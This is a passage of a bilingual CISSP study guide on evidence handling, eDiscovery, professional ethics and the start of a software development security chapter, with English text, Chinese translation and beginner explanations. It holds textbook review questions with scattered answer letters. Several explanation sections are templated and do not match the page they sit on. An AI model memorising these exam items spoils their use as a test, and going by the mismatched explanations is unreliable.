action or in finding the identity of the attacker. Evidence can also assist you in determining the extent of damage. Understand the eDiscovery process. Organizations that believe they will be the target of a lawsuit have a duty to preserve digital evidence in a process known as electronic discovery, or eDiscovery. The eDiscovery process includes information governance, identification, preservation, collection, processing, review, analysis, production, and presentation activities. Know how to investigate intrusions and how to gather sufficient artifacts from the equipment, software, and data. You must have possession of equipment, software, or data to analyze it and use it as evidence.

You must acquire the evidence without modifying it or allowing anyone else to modify it. Know the basic alternatives for confiscating evidence and when each one is appropriate. First, the person who owns the evidence could voluntarily surrender it. Second, a subpoena could be used to compel the subject to surrender the evidence. Third, a law enforcement officer performing a legally permissible duty may seize visible evidence that the officer has probable cause to believe is associated with criminal activity. Fourth, a search warrant is most useful when you need to confiscate evidence without giving the subject an opportunity to alter it.

Fifth, a law enforcement officer may collect evidence when exigent circumstances exist. Know the importance of retaining investigatory data. Because you will discover some incidents after they have occurred, you will lose valuable evidence unless you ensure that critical log files are retained for a reasonable period of time. You can retain log files and system status information either in place or in archives. Know the basic requirements for evidence to be admissible in a court of law. To be admissible, evidence must be relevant to a fact at issue in the case, the fact must be material to the case, and the evidence must be competent or legally collected.

Explain the various types of evidence that may be used in a criminal or civil trial. Real evidence consists of actual objects that can be brought into the courtroom. Documentary evidence consists of written documents that provide insight into the facts. Testimonial evidence consists of verbal or written statements made by witnesses.

中文直译 / 整理

行动或用于确定攻击者的身份。 证据还可以帮助您确定损害的程度。 了解电子取证流程。 预计将成为诉讼目标的组织有义务通过一种称为电子取证 (eDiscovery)的过程来保存数字证据。 eDiscovery流程包括信息治理、识别、 保存、收集、处理、审查、分析、生成和展示等活动。 了解如何调查入侵行为,以及如何从设备、软件和数据中收集足够的证据片 段。 您必须拥有设备、软件或数据,才能对其进行分析并将其作为证据使用。 您必须在不修改证据或允许他人修改证据的情况下获取证据。 了解扣押证据的基本替代方案及其适用时机。 首先,证据的所有者可以自愿交出 证据。 其次,可以通过传票强制当事人交出证据。 第三,执行合法职责的执法人 员可在有合理理由相信某可见证据与犯罪活动相关时予以扣押。 第四,当您需要 在不给当事人修改证据机会的情况下扣押证据时,搜查令最为有用。 第五,在紧 急情况下,执法人员可以收集证据。 了解保留调查数据的重要性。 由于某些事件在发生后才会被发现,除非你确保 关键日志文件在合理时间内保留,否则你将丢失宝贵的证据。 你可以将日志文件 和系统状态信息保留在原处或归档中。 了解证据在法庭上可采信的基本要求。

为使证据具有可采性,必须满足以下条 件:证据与案件中争议的事实相关,该事实对案件具有实质性,且证据是合法 获取或具有法律效力的。 解释在刑事或民事审判中可能使用的各种证据类型。 实物证据是由可以带入法 庭的实际物品组成的。 书面证据是由提供事实洞察的书面文件组成的。 证言证据 是由证人作出的口头或书面陈述组成的。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1316 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 38 / PDF P1317

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

Understand the importance of ethics to security personnel. Security practitioners are granted a very high level of authority and responsibility to execute their job functions. The potential for abuse exists, and without a strict code of personal behavior, security practitioners could be regarded as having unchecked power. Adherence to a code of ethics helps ensure that such power is not abused. Security professionals must subscribe to both their own organization's code of ethics as well as the ISC2 Code of Ethics. Know the ISC2 Code of Ethics and RFC 1087, Ethics and the Internet.

All CISSP candidates should be familiar with the entire ISC2 Code of Ethics because they have to sign an agreement that they will adhere to it. In addition, be familiar with the basic statements of RFC 1087. Written Lab 1. What are the major categories of computer crime? 2. What is the main motivation behind a thrill attack? 3. What is the difference between an interview and an interrogation? 4. What are the three basic requirements that evidence must meet in order to be admissible in court? Review Questions 1. Devin is revising the policies and procedures used by his organization to conduct investigations and would like to include a definition of computer crime.

Which one of the following definitions would best meet his needs? A. Any attack specifically listed in your security policy B. Any illegal attack that compromises a protected computer C. Any violation of a law or regulation that involves a computer D. Failure to practice due diligence in computer security 2. What is the main purpose of a military and intelligence attack? A. To attack the availability of military systems

中文直译 / 整理

理解伦理对安保人员的重要性。 安全从业人员被授予很高的权限和责任以执行其工作职能。 存在滥用的可能性, 如果没有严格的行为准则,安全从业人员可能会被视为拥有不受约束的权力。 遵守道德准则有助于确保这种权力不被滥用。 安全专业人员必须遵守其所在组 织的道德准则以及ISC2道德准则。 了解ISC2道德准则和RFC 1087《互联网伦理》。 所有CISSP考生都应熟悉 整个ISC2道德准则,因为他们必须签署协议承诺遵守该准则。 此外,还应熟 悉RFC 1087的基本内容。 书面实验 1. 计算机犯罪的主要类别有哪些? 2. 激励冲动攻击的主要动机是什么? 3. 面谈与审讯有何区别? 4. 证据要被法院采纳,必须满足哪三个基本要求? 复习题 1. 德文正在修订其组织用于开展调查的政策和程序,并希望包含计算机犯罪 的定义。 以下哪一项定义最符合他的需求? A. 你的安全策略中明确列出的任何攻击 B. 任何针对受保护计算机的非法攻击 C. 任何涉及计算机的违法行为或违规行为 D. 未在计算机安全方面尽到审慎义务 2. 军事和情报攻击的主要目的是什么? A. 攻击军事系统的可用性

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

尽职调查:尽职调查是持续检查、验证和监督是否做到了。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Due diligence 偏“确认事情被正确执行”。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
尽职调查 尽职调查是持续检查、验证和监督是否做到了。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 39 / PDF P1318

第 1318 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

B. To obtain secret and restricted information from military or law enforcement sources C. To utilize military or intelligence agency systems to attack other nonmilitary sites D. To compromise military systems for use in attacks against other systems 3. Which of the following is not a canon of the ISC2 Code of Ethics? A. Protect your colleagues. B. Provide diligent and competent service to principals. C. Advance and protect the profession. D. Protect society. 4. Which of the following is not an example of a financially motivated attack? A. Accessing services that you have not purchased B. Disclosing confidential personal employee information C.

Transferring funds from an unapproved source into your account D. Selling a botnet for use in a DDoS attack 5. Which one of the following attacker actions is most indicative of a terrorist attack? A. Altering sensitive trade secret documents B. Damaging the ability to communicate and respond to a physical attack C. Stealing unclassified information D. Transferring funds to other countries 6. Which of the following would not be a primary goal of a grudge attack? A. Disclosing embarrassing personal information B. Launching a virus on an organization's system C. Sending inappropriate email with a spoofed origination address of the victim organization B.

中文直译 / 整理

从军事或执法机构获取秘密和受限信息 C. 利用军事或情报机构系统攻击其他非军事目标 D. 破坏军事系统以用于攻击其他系统 3. 以下哪项不是 (ISC)² 伦理准则的准则? A. 保护你的同事。 B. 为委托人提供勤勉且称职的服务。 C. 推动并保护本职业。 D. 保护社会。 4. 以下哪项不是以财务为目的的攻击示例? 不 A. 访问您未购买的服务 B. 披露机密的个人员工信息 C. 将来自未经批准来源的资金转入您的账户 D. 出售僵尸网络用于DDoS攻击 5. 以下哪一项攻击者行为最能表明是恐怖袭击? A. 篡改敏感的商业秘密文件 B. 破坏通信和应对物理攻击的能力 C. 盗取非机密信息 D. 将资金转移到其他国家 6. 以下哪一项不是怨恨攻击的主要目标? A. 披露令人尴尬的个人信息 B. 在组织的系统上释放病毒 C. 发送带有伪造发件人地址的不当电子邮件,目标为受害组织

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1318 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 40 / PDF P1319

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

D. Using automated tools to scan the organization's systems for vulnerable ports 7. What are the primary reasons attackers engage in thrill attacks? (Choose all that apply.) A. Bragging rights B. Money from the sale of stolen documents C. Pride of conquering a secure system D. Retaliation against a person or organization 8. What is the most important rule to follow when collecting evidence? A. Do not turn off a computer until you photograph the screen. B. List all people present while collecting evidence. C. Avoid the modification of evidence during the collection process. D. Transfer all equipment to a secure storage location. 9.

What would be a valid argument for not immediately removing power from a machine when an incident is discovered? A. All of the damage has been done. Turning the machine off would not stop additional damage. B. There is no other system that can replace this one if it is turned off. C. Too many users are logged in and using the system. D. Valuable evidence in memory will be lost. 10. What type of evidence refers to written documents that are brought into court to prove a fact? A. Best evidence B. Parol evidence C. Documentary evidence D. Testimonial evidence 11. Which one of the following investigation types has the highest standard of evidence? A. Administrative D.

中文直译 / 整理

使用自动化工具扫描组织系统中的漏洞端口 7. 攻击者进行刺激攻击的主要原因是什么? (可多选。 ) A. 夸耀资本 B. 出售被盗文件所得的钱财 C. 征服安全系统的自豪感 D. 对个人或组织的报复 8. 收集证据时最重要的规则是什么? A. 在拍摄屏幕之前不要关闭计算机。 B. 列出收集证据时在场的所有人员。 C. 避免在收集过程中修改证据。 D. 将所有设备转移到安全的存储位置。 9. 当发现事件时,不立即切断机器电源的合理理由是什么? A. 所有损害都已造成。 关闭机器无法阻止进一步的损害。 B. 如果关闭此系统,没有其他系统可以替代它。 C. 有太多用户登录并使用该系统。 D. 内存中的宝贵证据将丢失。 10. 哪种类型的证据是指提交法庭以证明事实的书面文件? A. 最佳证据 B. 口头证据 C. 书面证据 D. 证人证言 11. 以下哪种调查类型具有最高的证据标准? A. 行政

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 41 / PDF P1320

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

B. Civil C. Criminal D. Regulatory 12. During an operational investigation, what type of analysis might an organization undertake to prevent similar incidents in the future? A. Forensic analysis B. Root cause analysis C. Network traffic analysis D. Fagan analysis 13. What step of the Electronic Discovery Reference Model ensures that information that may be subject to discovery is not altered? A. Preservation B. Production C. Processing D. Presentation 14. Gary is a system administrator and is testifying in court about a cybercrime incident. He brings server logs to support his testimony. What type of evidence are the server logs? A. Real evidence B. Documentary evidence C. Parol evidence D.

Testimonial evidence 15. You are a law enforcement officer and you need to confiscate a PC from a suspected attacker who does not work for your organization. You are concerned that if you approach the individual, they may destroy evidence. What legal avenue is most appropriate? A. Consent agreement signed by employees B. Search warrant C. No legal avenue is necessary. D. Voluntary consent B.

中文直译 / 整理

民事 C. 刑事 D. 监管 12. 在运营调查期间,组织可能会进行何种类型的分析,以防止未来发生类 似事件? A. 法证分析 B. 根本原因分析 C. 网络流量分析 D. 法根分析 13. 电子取证参考模型的哪个步骤确保 可能被发现的信息不会被篡改? A. 保全 B. 提供 C. 处理 D. 展示 14. 加里是一名系统管理员,正在法庭上就一起 cy网络犯罪事件作证。 他带来 g服务器日志 g以支持他的证词。 服务器日志属于哪种类型的证据? A. 实物证据 B. 书面证据 C. 口头证据 D. 证人证言 15. 你是一名执法人员,需要从一名非你组织员工的疑似攻击者手中没收一台 PC。 你担心如果直接接触该人员,他们可能会销毁证据。 最合适的法律途径 是什么? A. 员工签署的同意书 B. 搜查令 C. 无需法律途径。 D. 自愿同意

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 42 / PDF P1321

第 1321 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

16. Gavin is considering altering his organization's log retention policy to delete logs at the end of each day. What is the most important reason that he should avoid this approach? A. An incident may not be discovered for several days and valuable evidence could be lost. B. Disk space is cheap, and log files are used frequently. C. Log files are protected and cannot be altered. D. Any information in a log file is useless after it is several hours old. 17. What phase of the Electronic Discovery Reference Model examines information to remove information subject to attorney-client privilege? A. Identification B. Collection C. Processing D. Review 18. What are ethics? A.

Mandatory actions required to fulfill job requirements B. Laws of professional conduct C. Regulations set forth by a professional organization D. Rules of personal behavior 19. According to the ISC2 Code of Ethics, how are CISSPs expected to act? A. Honestly, diligently, responsibly, and legally B. Honorably, honestly, justly, responsibly, and legally C. Upholding the security policy and protecting the organization D. Trustworthy, loyally, friendly, courteously 20. Which of the following actions are considered unacceptable and unethical according to RFC 1087, “Ethics and the Internet”? A. Actions that compromise the privacy of classified information B.

Actions that compromise the privacy of users C. Actions that disrupt organizational activities 16. Gavin

中文直译 / 整理

正在考虑更改其组织的日志保留策略,以在每天结束时删除日 志。 他应避免这种做法的最重要原因是什么? A. 事件可能在几天后才被发现,而宝贵的证据可能会丢失。 B. 磁盘空间便宜,且日志文件经常被使用。 C. 日志文件受到保护,无法被修改。 D. 日志文件中的任何信息在数小时后就毫无用处。 17. 电子取证参考模型的哪个阶段会审查信息以移除受律师‑客户特权保护的信 息? A. 识别 B. 收集 C. 处理 D. 审查 18. 什么是伦理? A. 为履行工作要求所必需的行动 B. 职业行为准则 C. 专业组织制定的法规 D. 个人行为规范 19. 根据ISC2道德规范,CISSP应如何行事? A. 诚实、勤勉、负责任且合法地 B. 有尊严、诚实、公正、负责任且合法地 C. 坚持安全政策并保护组织 D. 可信赖、忠诚、友好、礼貌 20. 根据RFC 1087《道德与互联网》,以下哪些行为被视为不可接受且 不道德的? A. 损害机密信息隐私的行为 B. 损害用户隐私的行为 C. 扰乱组织活动的行为

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

保留期限:保留期限规定数据、日志或记录要保存多久。

日志:日志记录系统和用户活动,用于监控、审计和调查。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1321 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

日志要保护完整性、时间同步和访问控制。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
保留期限 保留期限规定数据、日志或记录要保存多久。
日志 日志记录系统和用户活动,用于监控、审计和调查。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 43 / PDF P1322

第 1322 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

D. Actions in which a computer is used in a manner inconsistent with a stated security policy D.

中文直译 / 整理

计算机以与声明的安全策略不一致的方式使用的操作

小白解释

场景先行:你是公司的安全负责人,正在读第 1322 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1322 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
第 20 章 · P1324-1394 · 71 个学习单元

软件开发安全

OSG10 · Chapter 20 · Software Development Security · 全文覆盖 + 小白精读 + 画报

第 20 章:软件开发安全

这不是提炼版。本页按 PDF 第 1324-1394 页连续覆盖第 20 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

71个连续学习单元
4格原文 / 直译 / 解释 / 考点
71页覆盖第20章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1324

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 3.0: Security Architecture and Engineering 3.5 Assess and mitigate the vulnerabilities of security architectures, designs, and solution elements 3.5.3 Database systems Domain 8.0: Software Development Security 8.1 Understand and integrate security in the Software Development Life Cycle (SDLC) 8.1.1 Development methodologies (e.g., Agile, Waterfall, DevOps, DevSecOps, Scaled Agile Framework) 8.1.2 Maturity models (e.g., Capability Maturity Model (CMM), Software Assurance Maturity Model (SAMM)) 8.1.3 Operation and maintenance 8.1.4 Change management 8.1.5 Integrated Product Team 8.2 Identify and apply security controls in software development ecosystems 8.2.1 Programming languages 8.2.2 Libraries 8.2.3 Tool sets 8.2.4 Integrated Development Environment 8.2.5 Runtime 8.2.6 Continuous Integration and Continuous Delivery (CI/CD) 8.2.7 Software Configuration Management (CM) 8.2.8 Code repositories 8.3 Assess the effectiveness of software security 8.3.1 Auditing and logging of changes 8.4 Assess security impact of acquired software

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域3.0:安全架构与工程 3.5 评估并缓解安全架构、设计和解决方案元素的漏洞 3.5.3 数据库系统 领域8.0:软件开发安全 8.1 理解并在软件开发生命周期(SDLC)中集成安全 8.1.1 开发方法论(例如,敏捷、瀑布、DevOps、DevSecOps、 规模化敏捷框架) 8.1.2 成熟度模型(例如,能力成熟度模型(CMM)、软件保证 成熟度模型(SAMM)) 8.1.3 运营与维护 8.1.4 变更管理 8.1.5 集成产品团队 8.2 在软件开发生态系统中识别并应用安全控制措施 8.2.1 编程语言 8.2.2 库 8.2.3 工具集 8.2.4 集成开发环境 8.2.5 运行时 8.2.6 持续集成和持续交付(CI/CD) 8.2.7 软件配置管理(CM) 8.2.8 代码存储库 8.3 评估软件安全的有效性 8.3.1 变更的审计与日志记录 8.4 评估所购软件的安全影响

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

安全越早进入 SDLC,修复成本越低。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
开发安全运营一体化 DevSecOps 把安全自动化嵌入开发和交付流程。
学习单元 02 / PDF P1325

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

8.4.1 Commercial-off-the-shelf (COTS) 8.4.2 Open source 8.4.3 Third-party 8.5 Define and apply secure coding guidelines and standards 8.5.2 Security of application programming interfaces (API) 8.5.3 Secure coding practices 8.5.4 Software-defined security Software development is a complex and challenging task undertaken by developers with many different skill levels and varying levels of security awareness. Applications created and modified by these developers often work with sensitive data and interact with members of the general public.

That means that applications can present significant risks to enterprise security, and information security professionals must understand these risks, balance them with business requirements, and implement appropriate risk mitigation mechanisms. Introducing Systems Development Controls Many organizations use custom-developed software to achieve their unique business objectives. These custom solutions can present great security vulnerabilities as a result of malicious and/or careless developers who create backdoors, buffer overflow vulnerabilities, or other weaknesses that can leave a system open to exploitation by malicious individuals.

To protect against these vulnerabilities, it's vital to introduce security controls into the entire system's development life cycle. An organized, methodical process helps ensure that solutions meet functional requirements as well as security guidelines. The following sections explore the spectrum of systems development activities with an eye toward security concerns that should be foremost on the mind of any information security professional engaged in solutions development. Software Development Security should be a consideration at every stage of a system's development, including the software development process. Programmers should strive to 8.4.1

中文直译 / 整理

商用现成产品(COTS) 8.4.2 开源 8.4.3 第三方 8.5 定义并应用安全编码指南和标准 8.5.2 应用程序编程接口(API)的安全性 8.5.3 安全编码实践 8.5.4 软件定义安全 软件开发是一项由具有不同技能水平和安全意识的开发人员承担的复杂且具有 挑战性的任务。 这些开发人员创建和修改的应用程序通常处理敏感数据,并与 普通公众互动。 这意味着应用程序可能对企业的安全构成重大风险,信息安全 专业人员必须理解这些风险,平衡其与业务需求,并实施适当的缓解机制。 引入系统开发控制 许多组织使用定制开发的软件来实现其独特的业务目标。 这些定制解决方案可 能因恶意或疏忽的开发人员而存在严重的安全漏洞,例如创建后门、缓冲区溢 出漏洞或其他弱点,从而使系统容易受到恶意人员的利用。 为防范这些漏洞,必须在系统的整个开发生命周期中引入安全控制。 一个有组 织、系统化的过程有助于确保解决方案既满足功能需求,又符合安全规范。 以 下章节将探讨系统开发活动的各个方面,重点关注任何参与解决方案开发的信 息安全专业人员应始终优先考虑的安全问题。 软件开发 安全应成为系统开发每个阶段的考虑因素,包括软件开发过程。 程序员应努力

小白解释

场景先行:你是公司的安全负责人,正在读第 1325 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

